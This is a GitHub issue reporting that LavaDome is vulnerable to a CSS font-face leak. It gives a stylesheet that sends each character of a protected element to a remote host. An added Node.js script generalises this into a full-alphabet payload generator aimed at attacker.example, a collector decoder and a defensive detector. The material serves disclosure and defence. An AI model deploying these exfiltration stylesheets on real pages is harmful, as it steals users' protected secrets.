LavaDome is vulnerable to font-face based leak attack
Closed this issue · 1 comment
weizman commented
Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:
<style>
/* One @font-face rule per character to test. The browser only fetches a font
   whose unicode-range covers a glyph it actually has to render, so the
   request to //l0.cm/ fires only if that character appears inside #PRIVATE. */
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:A'); /* request reveals that 'A' is present */
unicode-range:U+0041;        /* 'A' */
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:B');
unicode-range:U+0042;        /* 'B' */
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:C');
unicode-range:U+0043;        /* 'C' */
}
/* Point the protected element at the attacker-controlled family; fonts are
   typically requested in rendering order, which is why the order of the
   leaked characters is usually recovered too. */
#PRIVATE{
font-family:attack;
}
</style>
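As an added example, not code from this issue, from @masatokinugawa or from LavaDome, the Node.js script below generalises the three-rule stylesheet above to an arbitrary alphabet, shows how the collector turns its request log back into the leaked characters, and flags such rules in a stylesheet from the defender's side. The function names and the host attacker.example are assumptions; the stylesheet it scans last is the one posted above, copied in as sample input.

```javascript
// Added example (not LavaDome's or the issue author's code). Hypothetical
// helper names; the collector host "attacker.example" is made up.

// Format a code point the way unicode-range expects it: U+XXXX (>= 4 hex digits).
function toUnicodeRange(ch) {
  const cp = ch.codePointAt(0);
  return 'U+' + cp.toString(16).toUpperCase().padStart(4, '0');
}

// Build one @font-face rule per character in `chars`. The browser only fetches
// a font whose unicode-range covers a glyph it has to render, so each request
// to the collector reveals that the character is present in `selector`.
function buildFontFaceLeak(chars, collectorBase, selector, family = 'attack') {
  const rules = [...chars].map((ch) => {
    const tag = encodeURIComponent(ch);
    return `@font-face{font-family:${family};src:url('${collectorBase}?Found:${tag}');unicode-range:${toUnicodeRange(ch)};}`;
  });
  rules.push(`${selector}{font-family:${family};}`);
  return rules.join('\n');
}

// Collector side: turn the observed request paths (in arrival order) back into
// the leaked characters. Arrival order usually follows rendering order, which
// is why the post says the order is recovered "most of the time"; nothing here
// depends on that.
function recoverLeakedChars(requestPaths) {
  const leaked = [];
  for (const path of requestPaths) {
    const m = /\?Found:([^&\s]+)/.exec(path);
    if (m) leaked.push(decodeURIComponent(m[1]));
  }
  return leaked;
}

// Defender side: flag @font-face rules whose unicode-range is a single code
// point and whose src is a remote URL. Legitimate subsetted webfonts declare
// wide ranges; one-code-point ranges pointing off-origin are this leak's shape.
function findSingleCodePointFonts(css) {
  const hits = [];
  const ruleRe = /@font-face\s*{([^}]*)}/g;
  let r;
  while ((r = ruleRe.exec(css)) !== null) {
    const body = r[1];
    const src = /src\s*:\s*url\(\s*['"]?([^'")]+)/i.exec(body);
    const range = /unicode-range\s*:\s*([^;]+)/i.exec(body);
    if (!src || !range) continue;
    const single = /^U\+[0-9A-F]{1,6}$/i.test(range[1].trim());
    const remote = /^(https?:)?\/\//i.test(src[1].trim());
    if (single && remote) hits.push({ src: src[1].trim(), range: range[1].trim() });
  }
  return hits;
}

// Sample input: the stylesheet from the issue, copied verbatim.
const ISSUE_STYLESHEET = `
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:A');
unicode-range:U+0041;
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:B');
unicode-range:U+0042;
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:C');
unicode-range:U+0043;
}
#PRIVATE{
font-family:attack;
}`;

// Usage: generate a payload for the full uppercase alphabet and digits, then
// show what the collector would reconstruct from a constructed request log.
const ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
console.log(buildFontFaceLeak(ALPHABET, '//attacker.example/', '#PRIVATE'));
console.log(recoverLeakedChars(['/?Found:S', '/?Found:3', '/favicon.ico', '/?Found:C']));
console.log(findSingleCodePointFonts(ISSUE_STYLESHEET));
```

The detection function is a heuristic for review or CSP-free environments: it will also flag a legitimately split font that happens to carry a single glyph, so treat a hit as something to inspect rather than as proof of exfiltration.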